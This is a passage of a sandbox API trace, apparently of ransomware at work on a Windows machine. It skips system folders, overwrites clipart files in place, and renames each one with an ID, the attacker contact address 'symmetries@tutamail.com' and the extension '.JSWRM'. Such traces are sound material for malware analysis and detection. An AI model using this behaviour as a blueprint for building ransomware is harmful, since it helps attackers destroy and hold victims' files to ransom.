-1 [0086.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0086.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187895.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187895.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187895.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187895.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187895.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187895.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0086.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0086.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.986] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3472) returned 1 [0086.986] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd90) returned 0x23fc98 [0086.986] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd90, lpOverlapped=0x0) returned 1 [0087.047] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.047] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd90, lpOverlapped=0x0) returned 1 [0087.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0087.047] CloseHandle (hObject=0x314) returned 1 [0087.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0087.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0087.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0087.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0087.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0087.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.048] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0087.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.049] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1388, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187921.WMF", cAlternateFileName="")) returned 1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2=".") returned 1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="..") returned 1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="...") returned 1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="windows") returned -1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="recovery") returned -1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="perflogs") returned -1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="documents and settings") returned 1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="system volume information") returned -1 [0087.049] lstrcmpiW (lpString1="J0187921.WMF", lpString2="msocache") returned -1 [0087.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187921.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187921.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187921.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187921.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187921.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187921.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.050] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5000) returned 1 [0087.050] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x205850 [0087.050] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0087.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.052] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0087.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.052] CloseHandle (hObject=0x314) returned 1 [0087.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0087.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0087.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0087.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0087.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0087.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.053] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0087.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.054] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188511.WMF", cAlternateFileName="")) returned 1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2=".") returned 1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="..") returned 1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="...") returned 1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="windows") returned -1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="recovery") returned -1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="perflogs") returned -1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="documents and settings") returned 1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="system volume information") returned -1 [0087.054] lstrcmpiW (lpString1="J0188511.WMF", lpString2="msocache") returned -1 [0087.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188511.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188511.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188511.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188511.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188511.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188511.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0087.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.055] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10716) returned 1 [0087.055] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29d0) returned 0x24d210 [0087.055] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x29d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x29d0, lpOverlapped=0x0) returned 1 [0087.058] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.058] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x29d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x29d0, lpOverlapped=0x0) returned 1 [0087.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.058] CloseHandle (hObject=0x314) returned 1 [0087.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0087.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0087.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0087.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.058] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.059] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3004, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188513.WMF", cAlternateFileName="")) returned 1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2=".") returned 1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="..") returned 1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="...") returned 1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="windows") returned -1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="recovery") returned -1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="perflogs") returned -1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="documents and settings") returned 1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="system volume information") returned -1 [0087.059] lstrcmpiW (lpString1="J0188513.WMF", lpString2="msocache") returned -1 [0087.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188513.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188513.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188513.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188513.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188513.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188513.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0087.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 